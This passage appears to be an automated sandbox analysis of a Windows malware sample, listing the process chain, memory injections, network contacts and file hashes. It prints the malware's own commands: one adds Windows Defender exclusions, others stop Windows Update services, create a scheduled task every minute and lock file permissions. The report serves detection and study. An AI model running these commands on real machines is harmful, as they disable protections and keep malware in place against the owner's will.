Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5AC6.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 1196 wrote to memory of 2704 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1CC.exe
PID 1196 wrote to memory of 2704 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1CC.exe
PID 1196 wrote to memory of 2704 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1CC.exe
PID 1196 wrote to memory of 2704 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1CC.exe
PID 2704 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\A1CC.exe C:\Windows\SysWOW64\WerFault.exe
PID 2704 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\A1CC.exe C:\Windows\SysWOW64\WerFault.exe
PID 2704 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\A1CC.exe C:\Windows\SysWOW64\WerFault.exe
PID 2704 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\A1CC.exe C:\Windows\SysWOW64\WerFault.exe
PID 1196 wrote to memory of 1244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\BCCC.bat
PID 1196 wrote to memory of 1244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\BCCC.bat
PID 1196 wrote to memory of 1244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\BCCC.bat
PID 1196 wrote to memory of 1244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\BCCC.bat
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe

"C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 36

C:\Users\Admin\AppData\Local\Temp\97CD.exe

C:\Users\Admin\AppData\Local\Temp\97CD.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe

C:\Users\Admin\AppData\Local\Temp\A1CC.exe

C:\Users\Admin\AppData\Local\Temp\A1CC.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 132

C:\Users\Admin\AppData\Local\Temp\BCCC.bat

"C:\Users\Admin\AppData\Local\Temp\BCCC.bat"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe

C:\Users\Admin\AppData\Local\Temp\C46B.exe

C:\Users\Admin\AppData\Local\Temp\C46B.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 132

C:\Users\Admin\AppData\Local\Temp\CC0A.exe

C:\Users\Admin\AppData\Local\Temp\CC0A.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C2A3.tmp\C3DC.tmp\C5A2.bat C:\Users\Admin\AppData\Local\Temp\BCCC.bat"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wg5mI1Lf.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wg5mI1Lf.exe

C:\Users\Admin\AppData\Local\Temp\CDDF.exe

C:\Users\Admin\AppData\Local\Temp\CDDF.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\TT7kp0pz.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\TT7kp0pz.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZD37Ls8.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZD37Ls8.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 280

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:996 CREDAT:340993 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1056 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\10E8.exe

C:\Users\Admin\AppData\Local\Temp\10E8.exe

C:\Users\Admin\AppData\Local\Temp\5355.exe

C:\Users\Admin\AppData\Local\Temp\5355.exe

C:\Users\Admin\AppData\Local\Temp\572D.exe

C:\Users\Admin\AppData\Local\Temp\572D.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1736 -s 528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 508

C:\Users\Admin\AppData\Local\Temp\5AC6.exe

C:\Users\Admin\AppData\Local\Temp\5AC6.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.35:443 facebook.com tcp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
CZ 157.240.30.35:443 fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
CZ 157.240.30.35:443 fbsbx.com tcp
CZ 157.240.30.35:443 fbsbx.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
NL 142.250.179.206:443 accounts.youtube.com tcp
NL 142.250.179.206:443 accounts.youtube.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 85.209.176.171:80 85.209.176.171 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

MD5 a42bb483360857d54a8187b28fd726a3
SHA1 98f94fda7cf8aa042c1f3645a5bde7fa3c0080e5
SHA256 6446edc0dd30404b8fedcb11b83fe99f66ed6935dad65dbc9cb40314427f256d
SHA512 5395266a85f1be8b94763e2d860c2a7ff0e43dbf460876f40a9c26522600f1b07a2899d05e264fa2bf527b5c80b27edce6e67db0fd3fc1fa75f073995e36e118

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

MD5 a42bb483360857d54a8187b28fd726a3
SHA1 98f94fda7cf8aa042c1f3645a5bde7fa3c0080e5
SHA256 6446edc0dd30404b8fedcb11b83fe99f66ed6935dad65dbc9cb40314427f256d
SHA512 5395266a85f1be8b94763e2d860c2a7ff0e43dbf460876f40a9c26522600f1b07a2899d05e264fa2bf527b5c80b27edce6e67db0fd3fc1fa75f073995e36e118

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

MD5 a42bb483360857d54a8187b28fd726a3
SHA1 98f94fda7cf8aa042c1f3645a5bde7fa3c0080e5
SHA256 6446edc0dd30404b8fedcb11b83fe99f66ed6935dad65dbc9cb40314427f256d
SHA512 5395266a85f1be8b94763e2d860c2a7ff0e43dbf460876f40a9c26522600f1b07a2899d05e264fa2bf527b5c80b27edce6e67db0fd3fc1fa75f073995e36e118

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

MD5 a42bb483360857d54a8187b28fd726a3
SHA1 98f94fda7cf8aa042c1f3645a5bde7fa3c0080e5
SHA256 6446edc0dd30404b8fedcb11b83fe99f66ed6935dad65dbc9cb40314427f256d
SHA512 5395266a85f1be8b94763e2d860c2a7ff0e43dbf460876f40a9c26522600f1b07a2899d05e264fa2bf527b5c80b27edce6e67db0fd3fc1fa75f073995e36e118

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

memory/2800-23-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2800-24-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2800-25-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2800-26-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2800-27-0x0000000000400000-0x0000000000409000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

memory/1196-31-0x0000000002B40000-0x0000000002B56000-memory.dmp

memory/2800-34-0x0000000000400000-0x0000000000409000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

\Users\Admin\AppData\Local\Temp\97CD.exe

MD5 f6d480ab491757c15f2ec4b93d58c316
SHA1 6c4c1880cb5be4518bb45e99948c0c983c76d7bd
SHA256 80f237543360f5ebf130bcbf4609972bbcbaec9866150ffb061ae63750967f5c
SHA512 f5b9c532572a6631695e887eebcccfd049befc5ab83fcfe8047a337ce026949161b49931ba939b34080873e8ae510a8c637a1002ce6a714fa5e38d8e2f51e107

C:\Users\Admin\AppData\Local\Temp\97CD.exe

MD5 f6d480ab491757c15f2ec4b93d58c316
SHA1 6c4c1880cb5be4518bb45e99948c0c983c76d7bd
SHA256 80f237543360f5ebf130bcbf4609972bbcbaec9866150ffb061ae63750967f5c
SHA512 f5b9c532572a6631695e887eebcccfd049befc5ab83fcfe8047a337ce026949161b49931ba939b34080873e8ae510a8c637a1002ce6a714fa5e38d8e2f51e107

C:\Users\Admin\AppData\Local\Temp\97CD.exe

MD5 f6d480ab491757c15f2ec4b93d58c316
SHA1 6c4c1880cb5be4518bb45e99948c0c983c76d7bd
SHA256 80f237543360f5ebf130bcbf4609972bbcbaec9866150ffb061ae63750967f5c
